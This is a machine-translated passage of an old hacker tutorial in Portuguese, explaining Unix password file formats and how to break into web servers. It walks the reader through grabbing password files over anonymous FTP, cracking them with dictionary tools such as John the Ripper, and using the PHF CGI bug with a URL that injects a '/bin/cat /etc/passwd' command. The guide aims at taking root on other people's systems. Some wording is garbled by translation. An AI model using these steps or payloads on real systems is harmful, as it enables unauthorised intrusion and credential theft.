Está en la página 1de 2

Hackear páginas da Web

Hackeando páginas da Web

Capítulo 4: Hackeando páginas da Web

Obtendo o arquivo de senha por meio de FTP

Ok, bem, uma das maneiras mais fáceis de obter acesso de superusuário é por meio de
acesso ftp anônimo a uma página da web. Primeiro você precisa aprender um pouco
sobre
o arquivo de senha...

root:User:d7Bdg:1n2HG2:1127:20:Superuser
TomJones:p5Y(h0tiC:1229:20:Tom Jones,:/usr/people/tomjones:/bin/ csh
BBob:EUyd5XAAtv2dA:1129:20:Billy Bob:/usr/people/bbob:/bin/csh

Este é um exemplo de um arquivo de senha criptografada regular. O superusuário é


a parte que lhe dá root. Essa é a parte principal do arquivo.

root:x:0:1:Superusuário:/:
ftp:x:202:102:Anônimo ftp:/u1/ftp:
ftpadmin:x:203:102:ftp Administrador:/u1/ftp

Este é outro exemplo de arquivo de senha, só que este tem uma pequena
diferença, é sombreado. Os arquivos de senha ocultos não permitem visualizar ou
copiar a senha criptografada real. Isso causa problemas para o cracker de senhas
e para o criador de dicionários (ambos explicados posteriormente no texto). Abaixo
está
outro exemplo de um arquivo de senha oculta:

root:x:0:1:0000-Admin(0000):/:/usr/bin/csh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
sys:x:3:3:0000-Admin(0000):/:
adm:x:4:4:0000-Admin(0000 ):/var/adm:
lp:x:71:8:0000-lp(0000):/usr/spool/lp:
smtp:x:0:0:mail daemon user:/:
uucp:x:5:5 :0000-uucp(0000):/usr/lib/uucp:
nuucp:x:9:9:0000-uucp(0000):/var/spool/uucppublic:/usr/lib/uucp/uucico
listen:x:37:4:Network Admin:/usr/net/nls:
ninguém: x:60001:60001:uid sem corpo:/:
noaccess:x:60002:60002:uid sem acesso:/:
webmastr:x:53:53:WWW Admin:/export/home/webmastr:/usr/bin/csh
pin4geo:x:55:55:PinPaper
Admin:/export/home/webmastr/new/gregY/test/pin4geo:/bin/false
ftp:x:54:54:Anonymous FTP:/export/home/anon_ftp:/bin /false

Arquivos de senha sombreados têm um "x" no lugar de uma senha ou, às vezes
, também estão disfarçados de *.

Agora que você sabe um pouco mais sobre a aparência do arquivo de senha real
, você deve ser capaz de identificar um pw criptografado normal de um
arquivo pw sombreado. Agora podemos falar sobre como quebrá-lo.

Decifrar um arquivo de senha não é tão complicado quanto parece, embora os


arquivos variem de sistema para sistema. 1.O primeiro passo que você deve tomar é
baixar ou copiar o arquivo. 2. O segundo passo é encontrar um
cracker de senha e um criador de dicionário. Embora seja quase impossível encontrar
um
bom biscoito, existem alguns bons por aí. Eu recomendo que você procure
por Cracker Jack, John the Ripper, Brute Force Cracker ou Jack the Ripper.
Agora, para um fabricante de dicionário ou um arquivo de dicionário... Ao iniciar
um programa de
cracking, você será solicitado a encontrar o arquivo de senha. É aí que
entra um criador de dicionários. Você pode baixar um de quase todas as páginas de
hackers
na rede. Um criador de dicionário encontra todas as letras possíveis
combinações com o alfabeto que você escolher (ASCII, maiúsculas, minúsculas e
letras numéricas também podem ser adicionadas). Estaremos liberando nosso arquivo
de senha
para o público em breve, ele será chamado, Psychotic Candy, "The Perfect Drug".
Tanto quanto sabemos, será um dos maiores em circulação. 3. Você então inicia o
cracker e segue as instruções que ele lhe dá
.

A técnica PHF

Bem, eu não tinha certeza se deveria incluir esta seção devido ao fato de que
todos já a conhecem e a maioria dos servidores já descobriu
o bug e o corrigiu. Mas desde que me fizeram perguntas sobre o pff
, decidi incluí-lo.

A técnica pff é de longe a maneira mais fácil de obter um arquivo de senha


(embora não funcione 95% das vezes). Mas para fazer o phf tudo que você faz
é abrir um navegador e digitar o seguinte link:

http://webpage_goes_here/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

Você substitui o webpage_goes_here com o domínio. Portanto, se você estiver


tentando
obter o arquivo pw para www.webpage.com, digite:

http://www.webpage.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/ passwd

e pronto! Você apenas senta e copia o arquivo (se funcionar).

A melhor maneira de obter root é com um exploit. Exploits são explicados no


próximo capítulo.

También podría gustarte